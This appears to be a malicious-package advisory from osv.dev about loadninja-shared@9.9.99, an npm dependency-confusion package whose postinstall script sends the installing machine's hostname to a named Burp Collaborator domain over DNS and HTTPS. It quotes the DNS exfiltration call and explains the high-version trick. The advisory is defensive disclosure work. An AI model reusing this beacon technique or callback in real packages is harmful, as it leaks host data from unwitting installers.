loadninja-shared @9.9.99
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5744
Ecosystem
npm
Summary
loadninja-shared@9.9.99 is a dependency-confusion package targeting an internal/private package namespace. package.json declares "postinstall": "node beacon.js" , which fires automatically on npm install . beacon.js reads os.hostname() and transmits it — together with a nonce and the package name — to the attacker-controlled out-of-band domain tspeuj1fodn3cj8v30uck2fs4jaby1mq.oastify.com (Burp Collaborator infrastructure) over both a DNS lookup ( dns.lookup(NONCE + '.' + host63 + '.' + HOST,...) ) and an HTTPS POST. The version 9.9.99 is the canonical high-version trick used to win npm resolution against a legitimate internal package of the same name, capturing misrouted internal builds. Although a code comment labels the file a "benign PoC," the behavior is identical to a live dependency-confusion exploitation beacon: any installer that resolves this package leaks its host identifier to a third-party callback domain without consent.
Source: amazon-inspector (dc01a627a5f67d1af201bfe6575973437cce899d9767312d44a40369dc16cc46)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.